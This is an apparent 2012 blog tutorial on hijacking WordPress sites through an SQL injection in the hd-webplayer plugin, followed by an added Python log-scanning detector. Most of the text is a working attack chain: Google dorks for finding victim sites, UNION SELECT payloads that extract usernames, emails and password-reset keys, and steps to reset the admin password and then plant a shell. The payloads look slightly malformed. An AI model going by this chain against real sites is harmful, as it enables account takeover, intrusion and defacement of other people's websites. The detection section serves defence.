As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.
Watch this video tutorial for more help: http://www.youtube.com/embed/C5VKrCLEEM4?feature=player_embedded
So let's begin.
I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Once you have found your site, you need to find the admin email and username.
I will be using this site as an example:
Code:
http://www.website.com/wp-content/plugin...?videoid=3
When I add ', the text disappears, so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www. website
.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION
SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3,5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now enter either the username or the email.
We can enter both, so it doesn't matter.
I entered the email.
Now when you get:
"Check your e-mail for the confirmation link."
it means that the reset key was successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www. website
.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION
SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3,5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www. website
.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION
SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3,5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login=
So my link will be:
Enter new password:
Log in with the new password and shell it.
NOTICE: For those who have difficulty with the language, you can use http://translate.google.co.id/?hl=id&tab=wT
That's all.
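From the defender's side, the request sequence in this walkthrough (a non-numeric `id`/`videoid` value sent to the hd-webplayer plugin, followed by wp-login.php `lostpassword` and `rp` requests from the same client) is visible in the web server access log. The Python below is an added example, not part of the original post; the log lines, IP addresses, the `classify` and `scan` names and the combined-log-format assumption are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from a real site); IPs are documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [10/Oct/2012:08:01:10 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3 HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2012:08:02:11 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3%27 HTTP/1.1" 200 0
203.0.113.9 - - [10/Oct/2012:08:03:40 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+UNION+SELECT+1,2+FROM+wp_users-- HTTP/1.1" 200 901
203.0.113.9 - - [10/Oct/2012:08:05:02 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [10/Oct/2012:08:06:30 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2012:08:07:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
'''

PLUGIN = "/wp-content/plugins/hd-webplayer/"
ID_PARAMS = ("id", "videoid")  # numeric parameters named in the search strings above
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

def classify(target):
    """Tag one request target: tampered plugin id, reset step, or None."""
    url = urlsplit(target)
    qs = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if url.path.startswith(PLUGIN):
        for param in ID_PARAMS:
            for value in qs.get(param, []):
                if not re.fullmatch(r"[0-9]+", value):  # legitimate ids are plain integers
                    return "tampered_id"
    elif url.path.endswith("/wp-login.php"):
        action = qs.get("action", [""])[0]
        if action in ("lostpassword", "rp"):
            return action
    return None

def scan(log_text):
    """Map client IP -> alert when a tampered plugin id is seen, escalating if a reset follows."""
    events = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and (tag := classify(m.group(2))):
            events.setdefault(m.group(1), []).append(tag)
    alerts = {}
    for ip, tags in events.items():
        if "tampered_id" in tags:
            later = tags[tags.index("tampered_id") + 1:]
            reset = "lostpassword" in later or "rp" in later
            alerts[ip] = "reset_after_injection" if reset else "injection_probe"
    return alerts

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

An alert of `reset_after_injection` for an account that did not request a reset is a reason to invalidate the pending reset key and review that account; the underlying fix is for the plugin to cast these parameters to integers or use prepared statements.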
Wednesday, October 10, 2012
How to hack wordpress website with Sqli vul.+ shell upload+ deface
8:06:00 AM